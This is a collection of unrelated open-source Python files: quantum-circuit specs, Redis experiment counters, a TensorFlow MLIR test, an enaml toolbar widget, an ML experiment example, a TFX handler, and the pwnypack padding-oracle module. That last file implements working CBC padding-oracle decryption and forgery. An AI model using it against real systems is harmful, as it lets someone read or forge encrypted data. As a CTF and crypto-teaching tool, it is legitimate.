'gate_types': defaultdict(int, {'RX': 1, 'CNOT': 1}),
'num_operations': 2,
'num_observables': 1,
'num_diagonalizing_gates': 0,
'num_used_wires': 2,
'depth': 2,
'num_trainable_params': 1,
'num_device_wires': 2,
'device_name': 'default.qubit',
'diff_method': 'parameter-shift',
'expansion_strategy': 'gradient',
'gradient_options': {'shift': 0.7853981633974483},
'interface': 'autograd',
'gradient_fn': 'pennylane.gradients.parameter_shift.param_shift',
'num_gradient_executions': 2}
"""
def specs_qnode(*args, **kwargs):
"""Returns information on the structure and makeup of provided QNode.
Dictionary keys:
* ``"num_operations"``
* ``"num_observables"``
* ``"num_diagonalizing_gates"``
* ``"gate_sizes"``: dictionary mapping gate number of wires to number of occurances
* ``"gate_types"``: dictionary mapping gate types to number of occurances
* ``"num_used_wires"``: number of wires used by the circuit
* ``"num_device_wires"``: number of wires in device
* ``"depth"``: longest path in directed acyclic graph representation
* ``"dev_short_name"``: name of QNode device
* ``"diff_method"``
Potential Additional Information:
* ``"num_trainable_params"``: number of individual scalars that are trainable
* ``"num_parameter_shift_executions"``: number of times circuit will execute when
calculating the derivative
Returns:
dict[str, Union[defaultdict, int]]: dictionary containing the QNode specifications
"""
initial_max_expansion = qnode.max_expansion
qnode.max_expansion = max_expansion
try:
qnode.construct(args, kwargs)
finally:
qnode.max_expansion = initial_max_expansion
if isinstance(qnode, qml.QNode):
# TODO: remove when the old QNode is removed
return qnode.specs
info = qnode.qtape.specs.copy()
info["num_device_wires"] = qnode.device.num_wires
info["device_name"] = qnode.device.short_name
info["expansion_strategy"] = qnode.expansion_strategy
info["gradient_options"] = qnode.gradient_kwargs
info["interface"] = qnode.interface
info["diff_method"] = (
_get_absolute_import_path(qnode.diff_method)
if callable(qnode.diff_method)
else qnode.diff_method
)
if isinstance(qnode.gradient_fn, qml.gradients.gradient_transform):
info["gradient_fn"] = _get_absolute_import_path(qnode.gradient_fn)
try:
info["num_gradient_executions"] = len(qnode.gradient_fn(qnode.qtape)[0])
except Exception as e: # pylint: disable=broad-except
# In the case of a broad exception, we don't want the `qml.specs` transform
# to fail. Instead, we simply indicate that the number of gradient executions
# is not supported for the reason specified.
info["num_gradient_executions"] = f"NotSupported: {str(e)}"
else:
info["gradient_fn"] = qnode.gradient_fn
return info
return specs_qnode
|
experiments/counters.py
|
PetrDlouhy/django-experiments
| 237 |
76462
|
from django.utils.functional import cached_property
from redis.exceptions import ConnectionError, ResponseError
from experiments.redis_client import get_redis_client
COUNTER_CACHE_KEY = 'experiments:participants:%s'
COUNTER_FREQ_CACHE_KEY = 'experiments:freq:%s'
class Counters(object):
@cached_property
def _redis(self):
return get_redis_client()
def increment(self, key, participant_identifier, count=1):
if count == 0:
return
try:
cache_key = COUNTER_CACHE_KEY % key
freq_cache_key = COUNTER_FREQ_CACHE_KEY % key
new_value = self._redis.hincrby(cache_key, participant_identifier, count)
# Maintain histogram of per-user counts
if new_value > count:
self._redis.hincrby(freq_cache_key, new_value - count, -1)
self._redis.hincrby(freq_cache_key, new_value, 1)
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
pass
def clear(self, key, participant_identifier):
try:
# Remove the direct entry
cache_key = COUNTER_CACHE_KEY % key
pipe = self._redis.pipeline()
freq, _ = pipe.hget(cache_key, participant_identifier).hdel(cache_key, participant_identifier).execute()
# Remove from the histogram
freq_cache_key = COUNTER_FREQ_CACHE_KEY % key
self._redis.hincrby(freq_cache_key, freq or 0, -1)
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
pass
def get(self, key):
try:
cache_key = COUNTER_CACHE_KEY % key
return self._redis.hlen(cache_key)
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return 0
def get_frequency(self, key, participant_identifier):
try:
cache_key = COUNTER_CACHE_KEY % key
freq = self._redis.hget(cache_key, participant_identifier)
return int(freq) if freq else 0
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return 0
def get_frequencies(self, key):
try:
freq_cache_key = COUNTER_FREQ_CACHE_KEY % key
# In some cases when there are concurrent updates going on, there can
# briefly be a negative result for some frequency count. We discard these
# as they shouldn't really affect the result, and they are about to become
# zero anyway.
return dict((int(k), int(v)) for (k, v) in self._redis.hgetall(freq_cache_key).items() if int(v) > 0)
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return dict()
def reset(self, key):
try:
cache_key = COUNTER_CACHE_KEY % key
self._redis.delete(cache_key)
freq_cache_key = COUNTER_FREQ_CACHE_KEY % key
self._redis.delete(freq_cache_key)
return True
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return False
def reset_pattern(self, pattern_key):
# Similar to reset, but accepts a key pattern instead of an exact key
try:
cache_key = COUNTER_CACHE_KEY % pattern_key
for key in self._redis.keys(cache_key):
self._redis.delete(key)
freq_cache_key = COUNTER_FREQ_CACHE_KEY % pattern_key
for key in self._redis.keys(freq_cache_key):
self._redis.delete(key)
return True
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return False
def reset_prefix(self, key_prefix):
# Delete all data in redis for a given key prefix
from experiments.utils import grouper
try:
for key_pattern in [COUNTER_CACHE_KEY, COUNTER_FREQ_CACHE_KEY]:
match = "%s:*" % (key_pattern % key_prefix)
key_iter = self._redis.scan_iter(match)
# Delete keys in groups of 1000 to prevent problems with long
# running experiments having many participants
for keys in grouper(key_iter, 1000):
# The last group will be padded with None to reach the specified batch
# size, so these are filtered out here
self._redis.delete(*filter(None, keys))
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
pass
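# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# Assumes a Redis server is reachable through get_redis_client(). Counters keeps a
# per-participant hash plus a per-key frequency histogram, which the calls below exercise.
if __name__ == '__main__':
    counters = Counters()
    counters.reset('signup_button')                            # start from a clean slate
    counters.increment('signup_button', 'user-1')              # user-1 counted once
    counters.increment('signup_button', 'user-1')              # user-1 counted twice
    counters.increment('signup_button', 'user-2')              # user-2 counted once
    print(counters.get('signup_button'))                       # 2 distinct participants
    print(counters.get_frequency('signup_button', 'user-1'))   # 2
    print(counters.get_frequencies('signup_button'))           # {1: 1, 2: 1}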
|
tensorflow/compiler/mlir/tensorflow/tests/tf_saved_model/structured_output.py
|
joshz123/tensorflow
| 388 |
76476
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# RUN: %p/structured_output | FileCheck %s
# pylint: disable=missing-docstring,line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from tensorflow.compiler.mlir.tensorflow.tests.tf_saved_model import common
class TestModule(tf.Module):
# The fNNNN name prefixes in this file are such that the sorted order of the
# functions in the resulting MLIR output match the order in the source file,
# allowing us to conveniently co-locate the CHECK's with the code they are
# checking.
#
# Note: CHECK-DAG doesn't work with CHECK-SAME/CHECK-NEXT.
# Check index paths for results.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = []})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0000_single_return"]
@tf.function(input_signature=[])
def f0000_single_return(self):
return tf.constant(1.0, shape=[1])
# Check index paths for results with multiple return values.
# Note that semantically in Python, multiple return values are equivalent
# to returning a tuple/list.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = [0]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = [1]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0001_multiple_results_no_punctuation"]
@tf.function(input_signature=[])
def f0001_multiple_results_no_punctuation(self):
return tf.constant(1.0, shape=[1]), tf.constant(1.0, shape=[2])
# Check index paths for results written explicitly with parentheses.
# This is semantically equivalent to the earlier test without parentheses,
# but this test serves as documentation of this behavior for the purposes
# of tf_saved_model users.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = [0]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = [1]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0002_multiple_results_parentheses"]
@tf.function(input_signature=[])
def f0002_multiple_results_parentheses(self):
return (tf.constant(1.0, shape=[1]), tf.constant(1.0, shape=[2]))
# Check index paths for results written explicitly with brackets.
# This is semantically equivalent to the earlier test without parentheses,
# but this test serves as documentation of this behavior for the purposes
# of tf_saved_model users.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = [0]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = [1]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0003_multiple_results_brackets"]
@tf.function(input_signature=[])
def f0003_multiple_results_brackets(self):
return [tf.constant(1.0, shape=[1]), tf.constant(1.0, shape=[2])]
# Check index paths for lists.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = [0, 0]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = [0, 1]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0004_list_2_elements"]
@tf.function(input_signature=[])
def f0004_list_2_elements(self):
return [[tf.constant(1.0, shape=[1]), tf.constant(1.0, shape=[2])]]
# Check index paths for dicts.
# Keys are linearized in sorted order, matching `tf.nest.flatten`.
# More thorough testing of this is in structured_input.py. The underlying code
# path for linearization is shared, so no need to replicate that testing here.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = ["x"]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = ["y"]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0005_dict_2_keys"]
@tf.function(input_signature=[])
def f0005_dict_2_keys(self):
return {
'x': tf.constant(1.0, shape=[1]),
'y': tf.constant(1.0, shape=[2]),
}
# Check index paths for outputs are correctly handled in the presence of
# multiple return statements.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}(
# CHECK-SAME: %arg0: tensor<f32> {tf_saved_model.index_path = [0]}
# CHECK-SAME: ) -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = ["x"]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0006_multiple_return_statements"]
@tf.function(input_signature=[tf.TensorSpec([], tf.float32)])
def f0006_multiple_return_statements(self, x):
if x > 3.:
return {'x': tf.constant(1.0, shape=[1])}
else:
return {'x': tf.constant(1.0, shape=[1])}
if __name__ == '__main__':
common.do_test(TestModule)
|
enaml/widgets/tool_bar.py
|
xtuzy/enaml
| 1,080 |
76487
|
<gh_stars>1000+
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Bool, Enum, List, Typed, ForwardTyped, observe
from enaml.core.declarative import d_
from .action import Action
from .action_group import ActionGroup
from .constraints_widget import ConstraintsWidget, ProxyConstraintsWidget
class ProxyToolBar(ProxyConstraintsWidget):
""" The abstract definition of a proxy ToolBar object.
"""
#: A reference to the ToolBar declaration.
declaration = ForwardTyped(lambda: ToolBar)
def set_button_style(self, style):
raise NotImplementedError
def set_movable(self, movable):
raise NotImplementedError
def set_floatable(self, floatable):
raise NotImplementedError
def set_floating(self, floating):
raise NotImplementedError
def set_dock_area(self, area):
raise NotImplementedError
def set_allowed_dock_areas(self, areas):
raise NotImplementedError
def set_orientation(self, orientation):
raise NotImplementedError
class ToolBar(ConstraintsWidget):
""" A widget which displays a row of tool buttons.
A ToolBar is typically used as a child of a MainWindow where it can
be dragged and docked in various locations in the same fashion as a
DockPane. However, a ToolBar can also be used as the child of a
Container and laid out with constraints, though in this case it will
lose its ability to be docked.
"""
#: The button style to apply to actions added to the tool bar.
button_style = d_(Enum(
'icon_only', 'text_only', 'text_beside_icon', 'text_under_icon'
))
#: Whether or not the tool bar is movable by the user. This value
#: only has meaning if the tool bar is the child of a MainWindow.
movable = d_(Bool(True))
#: Whether or not the tool bar can be floated as a separate window.
#: This value only has meaning if the tool bar is the child of a
#: MainWindow.
floatable = d_(Bool(True))
#: A boolean indicating whether or not the tool bar is floating.
#: This value only has meaning if the tool bar is the child of a
#: MainWindow.
floating = d_(Bool(False))
#: The dock area in the MainWindow where the tool bar is docked.
#: This value only has meaning if the tool bar is the child of a
#: MainWindow.
dock_area = d_(Enum('top', 'right', 'left', 'bottom'))
#: The areas in the MainWindow where the tool bar can be docked
#: by the user. This value only has meaning if the tool bar is the
#: child of a MainWindow.
allowed_dock_areas = d_(List(
Enum('top', 'right', 'left', 'bottom', 'all'), ['all'],
))
#: The orientation of the toolbar. This only has meaning when the
#: toolbar is not a child of a MainWindow and is used as part of
#: a constraints based layout.
orientation = d_(Enum('horizontal', 'vertical'))
#: Whether or not to automatically adjust the 'hug_width' and
#: 'hug_height' values based on the value of 'orientation'.
auto_hug = d_(Bool(True))
#: A reference to the ProxyToolBar object.
proxy = Typed(ProxyToolBar)
def items(self):
""" Get the items defined on the tool bar.
"""
allowed = (Action, ActionGroup)
return [c for c in self.children if isinstance(c, allowed)]
#--------------------------------------------------------------------------
# Observers
#--------------------------------------------------------------------------
@observe('button_style', 'movable', 'floatable', 'floating', 'dock_area',
'allowed_dock_areas', 'orientation')
def _update_proxy(self, change):
""" An observer which sends state change to the proxy.
"""
# The superclass handler implementation is sufficient.
super(ToolBar, self)._update_proxy(change)
#--------------------------------------------------------------------------
# DefaultValue Handlers
#--------------------------------------------------------------------------
def _default_hug_width(self):
""" Get the default hug width for the slider.
The default hug width is computed based on the orientation.
"""
if self.orientation == 'horizontal':
return 'ignore'
return 'strong'
def _default_hug_height(self):
""" Get the default hug height for the slider.
The default hug height is computed based on the orientation.
"""
if self.orientation == 'vertical':
return 'ignore'
return 'strong'
#--------------------------------------------------------------------------
# PostSetAttr Handlers
#--------------------------------------------------------------------------
def _post_setattr_orientation(self, old, new):
""" Post setattr the orientation for the tool bar.
If auto hug is enabled, the hug values will be updated.
"""
if self.auto_hug:
if new == 'vertical':
self.hug_width = 'strong'
self.hug_height = 'ignore'
else:
self.hug_width = 'ignore'
self.hug_height = 'strong'
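# Hedged illustration (not part of the original file): with ``auto_hug`` enabled,
# changing ``orientation`` swaps the hug values via ``_post_setattr_orientation``.
# This assumes the declaration can be instantiated directly, outside a running enaml UI.
def _demo_auto_hug():
    bar = ToolBar()                   # defaults: horizontal orientation, auto_hug=True
    bar.orientation = 'vertical'      # triggers _post_setattr_orientation
    assert bar.hug_width == 'strong' and bar.hug_height == 'ignore'
    bar.orientation = 'horizontal'
    assert bar.hug_width == 'ignore' and bar.hug_height == 'strong'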
|
Lib/test/test_compiler/testcorpus/77_class__class__no_class.py
|
diogommartins/cinder
| 1,886 |
76497
|
def f():
def g():
__class__
|
examples/simple_experiment_example.py
|
shaoeric/hyperparameter_hunter
| 688 |
76498
|
<gh_stars>100-1000
from hyperparameter_hunter import Environment, CVExperiment
from hyperparameter_hunter.utils.learning_utils import get_toy_classification_data
from xgboost import XGBClassifier
def execute():
env = Environment(
train_dataset=get_toy_classification_data(),
results_path="HyperparameterHunterAssets",
metrics=["roc_auc_score"],
cv_type="StratifiedKFold",
cv_params=dict(n_splits=5, shuffle=True, random_state=32),
)
experiment = CVExperiment(
model_initializer=XGBClassifier,
model_init_params=dict(
objective="reg:linear", max_depth=3, n_estimators=100, subsample=0.5
),
)
if __name__ == "__main__":
execute()
|
tfx/orchestration/portable/system_node_handler.py
|
avelez93/tfx
| 1,813 |
76501
|
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The base class of all system node handlers."""
import abc
from tfx.orchestration import metadata
from tfx.proto.orchestration import pipeline_pb2
from ml_metadata.proto import metadata_store_pb2
class SystemNodeHandler(abc.ABC):
"""SystemNodeHandler is the base class of all system nodes' handler."""
@abc.abstractmethod
def run(
self,
mlmd_connection: metadata.Metadata,
pipeline_node: pipeline_pb2.PipelineNode,
pipeline_info: pipeline_pb2.PipelineInfo,
pipeline_runtime_spec: pipeline_pb2.PipelineRuntimeSpec
) -> metadata_store_pb2.Execution:
"""Runs the system node and return the Execution.
Args:
mlmd_connection: ML metadata connection.
pipeline_node: The specification of the node that this launcher launches.
pipeline_info: The information of the pipeline that this node runs in.
pipeline_runtime_spec: The runtime information of the pipeline that this
node runs in.
Returns:
The execution of the run.
"""
pass
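# A hedged sketch of a concrete handler (illustrative only; the class name and the
# 'node_id' custom property below are assumptions, not part of TFX).
class _NoOpNodeHandler(SystemNodeHandler):
  """A minimal handler that records an Execution without doing any real work."""
  def run(
      self,
      mlmd_connection: metadata.Metadata,
      pipeline_node: pipeline_pb2.PipelineNode,
      pipeline_info: pipeline_pb2.PipelineInfo,
      pipeline_runtime_spec: pipeline_pb2.PipelineRuntimeSpec
  ) -> metadata_store_pb2.Execution:
    # Record which node ran; a real handler would also publish the execution to
    # MLMD through mlmd_connection and attach its input/output artifacts.
    execution = metadata_store_pb2.Execution()
    execution.custom_properties['node_id'].string_value = pipeline_node.node_info.id
    return execution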
|
pwnypack/oracle.py
|
iksteen/dpf
| 133 |
76521
|
<reponame>iksteen/dpf
"""
This module provides functions that, given an oracle function that returns
``True`` when a message is properly padded and ``False`` otherwise, will
decrypt or encrypt a given message assuming that the underlying cipher
operates in CBC mode.
"""
from __future__ import print_function, division
import functools
import multiprocessing
import threading
import os
from six.moves import map, range
__all__ = ['padding_oracle_decrypt', 'padding_oracle_encrypt']
def interruptable_iter(event, iterable):
for value in iterable:
yield value
if event.is_set():
break
def consult_oracle(oracle, chunk, block, is_last_byte):
if not oracle(bytes(chunk + block)):
return False
if is_last_byte:
chunk[-2] ^= 0x01
if not oracle(bytes(chunk + block)):
return False
return True
def check_padding_decrypt(event, oracle, block_len, chunk, block, plain, i, j):
if event.is_set():
return None
chunk, plain = chunk[:], plain[:]
plain[i] = j
chunk[i] ^= j
if consult_oracle(oracle, chunk, block, i == block_len - 1):
event.set()
return plain
def decrypt_block(oracle, block_len, alphabet, pool, progress, params):
start, prev, block, prefix, suffix, is_last_block = params
if pool is not None:
event_factory = multiprocessing.Manager().Event
map_func = pool.imap_unordered
else:
event_factory = threading.Event
map_func = map
plain = bytearray([0] * block_len)
for i, j in enumerate(prefix):
plain[i] = j
if progress is not None:
progress(start + i, j)
for i, j in enumerate(reversed(suffix)):
plain[block_len - i - 1] = j
if progress is not None:
progress(start + block_len - i - 1, j)
in_padding = is_last_block and not suffix
i = block_len - 1 - len(suffix)
while i >= len(prefix):
chunk = prev[:]
for k in range(i, block_len):
chunk[k] ^= plain[k] ^ (block_len - i)
event = event_factory()
f = functools.partial(check_padding_decrypt, event, oracle, block_len, chunk, block, plain, i)
if in_padding:
_alphabet = range(1, 17)
else:
_alphabet = alphabet
for result in map_func(f, interruptable_iter(event, _alphabet)):
if result is not None:
plain = result
if not event.is_set():
raise RuntimeError('Oracle is unstable')
if in_padding:
in_padding = False
pad_value = plain[-1]
for j in range(block_len - pad_value, i):
plain[j] = pad_value
if progress is not None:
progress(start + j, pad_value)
i -= pad_value
else:
if progress is not None:
progress(start + i, plain[i])
i -= 1
return plain
def block_pairs(block_len, data, known_prefix, known_suffix):
data_len = len(data)
suffix_len = len(known_suffix)
for prev, start, suffix_start in zip(range(data_len - block_len * 2, -1, -block_len),
range(data_len - block_len, -1, -block_len),
range(suffix_len - block_len, -data_len - 1, -block_len)):
yield (
prev,
data[prev:start],
data[start:start + block_len],
known_prefix[prev:start],
known_suffix[max(suffix_start, 0):max(suffix_start + block_len, 0)],
start + block_len == data_len
)
def padding_oracle_decrypt(oracle, ciphertext, known_prefix=b'', known_suffix=b'', block_size=128,
alphabet=None, pool=None, block_pool=None, progress=None):
"""
Decrypt ciphertext using an oracle function that returns ``True`` if the
provided ciphertext is correctly PKCS#7 padded after decryption. The
cipher needs to operate in CBC mode.
Args:
oracle(callable): The oracle function. Will be called repeatedly with
a chunk of ciphertext.
ciphertext(bytes): The data to decrypt. Should include the IV at the
start.
known_prefix(bytes): If the start of the plaintext is known, it can be
provided to skip decrypting the known prefix.
known_suffix(bytes): If the end of the plaintext is known, it can be
provided to skip decrypting the known suffix. Should include
padding.
block_size(int): The cipher's block size in bits.
alphabet(bytes): Optimize decryption if you know which characters the
plaintext will consist of.
pool(multiprocessing.Pool): A multiprocessing pool to use to
parallelize the decryption. This pool is used to call the oracle
function. Fairly heavy due to the required inter-process state
synchronization. If ``None`` (the default), no multiprocessing
will be used.
block_pool(multiprocessing.Pool): A multiprocessing pool to use to
parallelize the decryption. This pool is used to decrypt entire
blocks in parallel. When decrypting ciphertext consisting of
multiple blocks, it is usually more efficient than using the
``pool`` argument. If ``None`` (the default), no multiprocessing
will be used.
progress(callable): A callable that will be called each time a new
byte is decrypted. It is called with the position of the character
in the plaintext result and the character itself.
Returns:
bytes: The decrypted data with its PKCS#7 padding stripped.
Raises:
RuntimeError: Raised if the oracle behaves unpredictably.
Example:
>>> from pwny import *
>>> with multiprocessing.Pool(5) as pool:
...     print(padding_oracle_decrypt(oracle_function, encrypted_data, pool=pool))
b'decrypted data'
"""
block_len = block_size // 8
assert len(ciphertext) % block_len == 0 and len(ciphertext) >= 2 * block_len
known_prefix = bytearray(known_prefix)
known_suffix = bytearray(known_suffix)
if alphabet is None:
alphabet = bytearray(range(256))
if block_pool is not None:
map_func = block_pool.imap
else:
map_func = map
plaintext = bytearray()
decrypt_func = functools.partial(decrypt_block, oracle, block_len, alphabet, pool, progress)
for plain in map_func(decrypt_func, block_pairs(block_len, bytearray(ciphertext), known_prefix, known_suffix)):
plaintext[0:0] = plain
return bytes(plaintext[:-plaintext[-1]])
def check_padding_encrypt(event, oracle, block_len, chunk, block, i, j):
chunk = chunk[:]
chunk[i] = j
if consult_oracle(oracle, chunk, block, i == block_len - 1):
event.set()
return chunk
def encrypt_block(oracle, block_len, block, plain, pool):
if pool is not None:
event_factory = multiprocessing.Manager().Event
map_func = pool.imap_unordered
else:
event_factory = threading.Event
map_func = map
cipher = bytearray([0] * block_len)
for i in range(block_len - 1, -1, -1):
chunk = cipher[:]
for k in range(i + 1, block_len):
chunk[k] ^= block_len - i
event = event_factory()
f = functools.partial(check_padding_encrypt, event, oracle, block_len, chunk, block, i)
for result in map_func(f, interruptable_iter(event, range(256))):
if result is not None:
cipher[i] = result[i] ^ (block_len - i)
if not event.is_set():
raise RuntimeError('Oracle is unstable')
for k, p in enumerate(plain):
cipher[k] ^= p
return cipher
def padding_oracle_encrypt(oracle, plaintext, block_size=128, pool=None):
"""
Encrypt plaintext using an oracle function that returns ``True`` if the
provided ciphertext is correctly PKCS#7 padded after decryption. The
cipher needs to operate in CBC mode.
Args:
oracle(callable): The oracle function. Will be called repeatedly with
a chunk of ciphertext.
plaintext(bytes): The plaintext data to encrypt.
block_size(int): The cipher's block size in bits.
pool(multiprocessing.Pool): A multiprocessing pool to use to
parallelize the encryption. This pool is used to call the oracle
function. Fairly heavy due to the required inter-process state
synchronization. If ``None`` (the default), no multiprocessing
will be used.
Returns:
bytes: The encrypted data.
Raises:
RuntimeError: Raised if the oracle behaves unpredictably.
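Example:
An illustrative sketch; ``oracle_function`` is assumed to be a user-supplied
padding oracle, as in the decryption example above.
>>> from pwny import *
>>> with multiprocessing.Pool(5) as pool:
...     forged = padding_oracle_encrypt(oracle_function, b'attacker-chosen data', pool=pool)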
"""
plaintext = bytearray(plaintext)
block_len = block_size // 8
padding_len = block_len - (len(plaintext) % block_len)
plaintext.extend([padding_len] * padding_len)
ciphertext = bytearray()
chunk = bytearray(os.urandom(block_len))
ciphertext[0:0] = chunk
for plain_start in range(len(plaintext) - block_len, -1, -block_len):
plain = plaintext[plain_start:plain_start + block_len]
chunk = ciphertext[0:0] = encrypt_block(oracle, block_len, chunk, plain, pool)
return bytes(ciphertext)
|